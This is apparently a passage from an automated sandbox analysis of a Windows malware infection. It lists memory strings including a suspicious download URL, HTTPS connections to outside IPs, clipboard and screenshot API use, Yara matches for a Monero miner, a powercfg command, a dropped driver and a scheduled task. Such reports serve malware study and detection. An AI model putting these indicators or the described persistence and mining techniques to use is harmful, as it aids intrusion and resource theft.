                            Source: explorer.exe, 00000017.00000003.3848708673.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2606864640.0000000000824000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2667541330.000000000086D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txt
                            Source: explorer.exe, 00000017.00000003.3849116928.0000000002D33000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3308036317.0000000002D33000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txtC:
                            Source: explorer.exe, 00000017.00000003.2664467654.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txtI
                            Source: explorer.exe, 00000017.00000003.2606864640.0000000000824000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.win/P.txtmsmpeng.exe
                            Source: explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://woo097878781.wincaj
                            Source: cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: cad620f7d1.exe, 00000024.00000003.2937546058.0000000000BC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
                            Source: cad620f7d1.exe, 00000024.00000003.2787056296.000000000321F000.00000004.00000800.00020000.00000000.sdmp, cad620f7d1.exe, 00000024.00000003.2787334599.0000000003208000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50168 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50174 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50174
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50155
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50156
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50156 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50168
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50155 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
                            Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49776 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49854 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.4:49859 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49866 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49878 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49895 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49907 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49920 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49939 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:49957 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:50155 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 104.21.79.7:443 -> 192.168.2.4:50168 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,36_2_00431A30
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,36_2_00431A30
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00431BB0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,36_2_00431BB0

                            System Summary

                            barindex
                            Malicious sample detected (through community Yara rule)
                            Source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 51.3.Intel_PTT_EK_Recertification.exe.20d0fbb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                            Source: 00000033.00000003.2959352962.0000020D0FBB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 00000033.00000003.2959352962.0000020D0FBB0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects coinmining malware Author: ditekSHen
                            PE file contains section with special chars
                            Source: file.exeStatic PE information: section name:
                            Source: file.exeStatic PE information: section name: .idata
                            Source: skotes.exe.0.drStatic PE information: section name:
                            Source: skotes.exe.0.drStatic PE information: section name: .idata
                            Source: random[1].exe.5.drStatic PE information: section name:
                            Source: random[1].exe.5.drStatic PE information: section name: .idata
                            Source: random[1].exe.5.drStatic PE information: section name:
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name:
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name: .idata
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name:
                            Source: random[1].exe0.5.drStatic PE information: section name:
                            Source: random[1].exe0.5.drStatic PE information: section name: .idata
                            Source: random[1].exe0.5.drStatic PE information: section name:
                            Source: 6351911f1d.exe.5.drStatic PE information: section name:
                            Source: 6351911f1d.exe.5.drStatic PE information: section name: .idata
                            Source: 6351911f1d.exe.5.drStatic PE information: section name:
                            Source: random[2].exe0.5.drStatic PE information: section name:
                            Source: random[2].exe0.5.drStatic PE information: section name: .idata
                            Source: random[2].exe0.5.drStatic PE information: section name:
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name:
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name: .idata
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name:
                            Source: random[2].exe1.5.drStatic PE information: section name:
                            Source: random[2].exe1.5.drStatic PE information: section name: .idata
                            Source: random[2].exe1.5.drStatic PE information: section name:
                            Source: eb571902cc.exe.5.drStatic PE information: section name:
                            Source: eb571902cc.exe.5.drStatic PE information: section name: .idata
                            Source: eb571902cc.exe.5.drStatic PE information: section name:
                            Source: random[3].exe.5.drStatic PE information: section name:
                            Source: random[3].exe.5.drStatic PE information: section name: .idata
                            Source: 8d37f89c6f.exe.5.drStatic PE information: section name:
                            Source: 8d37f89c6f.exe.5.drStatic PE information: section name: .idata
                            Source: random[3].exe0.5.drStatic PE information: section name:
                            Source: random[3].exe0.5.drStatic PE information: section name: .idata
                            Source: random[3].exe0.5.drStatic PE information: section name:
                            Source: d0e065d272.exe.5.drStatic PE information: section name:
                            Source: d0e065d272.exe.5.drStatic PE information: section name: .idata
                            Source: d0e065d272.exe.5.drStatic PE information: section name:
                            Uses powercfg.exe to modify the power settings
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Windows Scripting host queries suspicious COM object (likely to drop second stage)
                            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                            Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 49%
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_009496AC: free,GetFileInformationByHandle,DeviceIoControl,free,free,memmove,free,27_2_009496AC
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\lkpwsyczzfuj.sys
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F078BB0_2_00F078BB
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F088600_2_00F08860
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F070490_2_00F07049
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F031A80_2_00F031A8
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC4B300_2_00EC4B30
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC4DE00_2_00EC4DE0
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F02D100_2_00F02D10
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0779B0_2_00F0779B
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF7F360_2_00EF7F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_007488601_2_00748860
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_007470491_2_00747049
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_007478BB1_2_007478BB
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_007431A81_2_007431A8
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00704B301_2_00704B30
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00742D101_2_00742D10
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00704DE01_2_00704DE0
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_00737F361_2_00737F36
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 1_2_0074779B1_2_0074779B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD9B8330E910_2_00007FFD9B8330E9
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0096F13E27_2_0096F13E
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_009624C027_2_009624C0
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0096545827_2_00965458
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_009647AC27_2_009647AC
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0098881727_2_00988817
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_00950DCC27_2_00950DCC
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0094F1B427_2_0094F1B4
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0094B11427_2_0094B114
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0095C27827_2_0095C278
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0098352827_2_00983528
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0097257827_2_00972578
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0097066E27_2_0097066E
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0096D66C27_2_0096D66C
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0095D85827_2_0095D858
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_009799B827_2_009799B8
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_009849A527_2_009849A5
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_009779DC27_2_009779DC
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0096694C27_2_0096694C
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0097FA0C27_2_0097FA0C
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0098DA3027_2_0098DA30
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_00958CA827_2_00958CA8
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0098DC1127_2_0098DC11
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_00957C6827_2_00957C68
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0098DD0027_2_0098DD00
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_00966E0827_2_00966E08
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_00948F1827_2_00948F18
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0095AF5827_2_0095AF58
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D317D031_2_00D317D0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D3100031_2_00D31000
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D41A1031_2_00D41A10
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D35C5231_2_00D35C52
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D33C0531_2_00D33C05
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D4042231_2_00D40422
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 31_2_00D4566E31_2_00D4566E
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040A96036_2_0040A960
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042617036_2_00426170
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040E2A936_2_0040E2A9
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00416B7E36_2_00416B7E
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00439B9036_2_00439B90
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004233A036_2_004233A0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00436C4036_2_00436C40
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043DCF036_2_0043DCF0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004215F036_2_004215F0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042C6D736_2_0042C6D7
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043E69036_2_0043E690
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042BFD336_2_0042BFD3
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00410FD636_2_00410FD6
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042BFDA36_2_0042BFDA
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004087F036_2_004087F0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00436F9036_2_00436F90
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004097B036_2_004097B0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00425F7D36_2_00425F7D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040907036_2_00409070
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043A03036_2_0043A030
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004038C036_2_004038C0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004380D936_2_004380D9
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041D8E036_2_0041D8E0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042D08536_2_0042D085
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004280B036_2_004280B0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042297F36_2_0042297F
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042A10036_2_0042A100
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043790036_2_00437900
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00416E9736_2_00416E97
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040591036_2_00405910
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042592036_2_00425920
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004301D036_2_004301D0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004081F036_2_004081F0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040899036_2_00408990
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041719036_2_00417190
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00414A4036_2_00414A40
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041BA4836_2_0041BA48
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040CA5436_2_0040CA54
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040427036_2_00404270
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042227036_2_00422270
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040620036_2_00406200
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00423A0036_2_00423A00
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043CAC036_2_0043CAC0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043E2C036_2_0043E2C0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004292D036_2_004292D0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00415ADC36_2_00415ADC
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042BA8D36_2_0042BA8D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004192BA36_2_004192BA
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040B35136_2_0040B351
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041CB5A36_2_0041CB5A
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040936036_2_00409360
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041C36036_2_0041C360
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00411B1B36_2_00411B1B
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043533A36_2_0043533A
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043CBD636_2_0043CBD6
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043A3F036_2_0043A3F0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00404BA036_2_00404BA0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040D44C36_2_0040D44C
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00434C4D36_2_00434C4D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040747036_2_00407470
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00419C1036_2_00419C10
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00418C1E36_2_00418C1E
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041D42036_2_0041D420
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041DC2036_2_0041DC20
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043643036_2_00436430
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043CCE036_2_0043CCE0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00422CF836_2_00422CF8
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00427C9D36_2_00427C9D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043CD6036_2_0043CD60
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041657136_2_00416571
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00423D3036_2_00423D30
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041DE4036_2_0041DE40
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041267036_2_00412670
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042567036_2_00425670
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041AE0036_2_0041AE00
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043CE0036_2_0043CE00
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00423E3036_2_00423E30
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004156D036_2_004156D0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00415EE036_2_00415EE0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004266E736_2_004266E7
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0040669036_2_00406690
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043669036_2_00436690
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00416E9736_2_00416E97
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00402EA036_2_00402EA0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004376B036_2_004376B0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00426EBE36_2_00426EBE
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00428F5D36_2_00428F5D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042B76336_2_0042B763
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00425F7D36_2_00425F7D
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00414F0836_2_00414F08
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0042071736_2_00420717
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041873136_2_00418731
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0041EF3036_2_0041EF30
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_004167A536_2_004167A5
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00418FAD36_2_00418FAD
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_0043DFB036_2_0043DFB0
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D3100036_2_00D31000
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D41A1036_2_00D41A10
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeCode function: 36_2_00D35C5236_2_00D35C52
